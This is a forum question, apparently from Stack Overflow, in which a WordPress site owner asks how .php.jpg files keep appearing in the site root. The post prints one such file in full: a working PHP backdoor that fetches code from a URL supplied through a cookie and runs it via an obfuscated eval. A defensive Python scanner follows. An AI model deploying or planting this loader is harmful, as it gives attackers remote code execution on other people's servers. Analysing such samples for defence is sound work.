I have someone or someones trying to execute .jpg.php exploits on my server to see if it will run as a PHP file. I have run my own version and it appears not to, but I am still nervous about it.

I am not looking for how to make a secure upload script.

I would like to know if anyone is getting .php.jpg files showing up in the root directory of their WordPress, how the file is getting there, and how to stop them from being able to move/save into that directory. Global prevention of saving a file extension in WordPress and global prevention of saving files in the root directory, perhaps.

Since it is WordPress, I don't have direct control over WordPress plugins and their restrictions on uploads unless I edit every single instance of uploads on every plugin (impractical).

I've checked all my plugins and can't seem to find one with said vulnerabilities.

Simply for information purposes, here is the file: randomname.php.jpg

<?php
@ob_start();
error_reporting(0);
@ini_set('html_errors','0');
@ini_set('display_errors','0');
@ini_set('display_startup_errors','0');
@ini_set('log_errors','0');
@set_time_limit(0);
@clearstatcache();

if (!isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])) {
    die('test');
}

//HASHCODEHERE

if (isset($_REQUEST['c'])) {
    setcookie("key", "", time() - 3600);
}

//HASHCODEHERE

if (isset($_REQUEST['key'])) {
    setcookie("key", $_REQUEST['key'], time() + 3600 * 24 * 7); //Seven Days.
    $_COOKIE['key'] = $_REQUEST['key'];
}

//HASHCODEHERE

if (!isset($_COOKIE['key'])) {
    $html = <<<EOF
    <form method="POST" action="">
    <input type="text" name="key">
    <input type="submit">
    </form>
EOF;
    die($html);
}

//HASHCODEHERE

$content =  remove_tags(_dl($_COOKIE['key']));

$func="cr"."eat"."e_fun"."cti"."on";

$remove_tags = $func('$x','ev'.'al'.'("?>".$x);');

$remove_tags($content);

function _dl($url)
{
    try {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $r = curl_exec($ch);
        curl_close($ch);
    } catch (Exception $e) {
        $r = file_get_contents($url);
    }
    return $r;
}

function remove_tags($content){
    return $content;
}

Current solution was restricting access in the .htaccess file to running a file like that. But I still don't know how the files are getting put into the root WordPress directory. If anyone can shed some light on this, that would be helpful!

Dyluck
  • I assume you allow file uploads? So check the uploaded file is a jpg, not a php script, and obviously not allow *.php extension –  Feb 15 '18 at 21:28
  • This is WordPress. I have no control over what plugin does what during upload, so I am looking to see if there is a more global prevention for this. The question more so is how the file is moving to the root WordPress directory (since uploads happen to the uploads folder in WordPress). – Dyluck Feb 15 '18 at 21:39
  • You have control over every line of code on your site –  Feb 15 '18 at 21:41
  • :/ Well yes, of course I have "control", but limited support then. I can disable all the necessary plugins that my site needs to run and program all that functionality myself. rtfm, do you know how I can globally override file extension uploads from WordPress plugins? – Dyluck Feb 15 '18 at 21:50

0 Answers
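
A read-only check for the kind of file described in the question, as an added example that is not part of the original post or of WordPress itself: it walks a WordPress directory and flags image-named files that carry a PHP extension or a PHP open tag, plus PHP files under an `uploads` directory. The extension list, the `uploads` directory name and the sample files are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Assumed list of extensions mapped to the PHP handler; adjust to your server config.
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".ico", ".webp")
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)

def scan(root):
    """Return sorted (relative_path, reason) pairs for suspicious files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            lower = name.lower()
            if lower.endswith(IMAGE_EXT):
                if PHP_EXT.search(lower):  # PHP extension before the image one, e.g. x.php.jpg
                    findings.append((rel, "php-extension-in-image-name"))
                try:
                    with open(path, "rb") as fh:
                        head = fh.read(64 * 1024)
                except OSError:
                    continue  # unreadable file: skip rather than abort the scan
                if PHP_TAG.search(head):  # PHP open tag in the first 64 KiB
                    findings.append((rel, "php-code-in-image"))
            elif PHP_EXT.search(lower) and "uploads" in rel.split(os.sep):
                # Assumes the default wp-content/uploads layout: no PHP belongs there
                findings.append((rel, "php-in-uploads"))
    return sorted(findings)

def build_sample_tree(root):
    samples = {  # constructed sample files, not taken from a real site
        "index.php": b"<?php // normal entry point in the site root",
        "randomname.php.jpg": b"<?php @ob_start();",
        "wp-content/uploads/2018/02/photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF",
        "wp-content/uploads/avatar.png": b"\x89PNG\r\n\x1a\n<?php echo 1;",
        "wp-content/uploads/cache.php": b"<?php echo 1;",
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(*scan(tmp), sep="\n")
```

Point `scan()` at the real WordPress root; the modification time of each hit can then be compared with the web server access log to find the request that wrote the file.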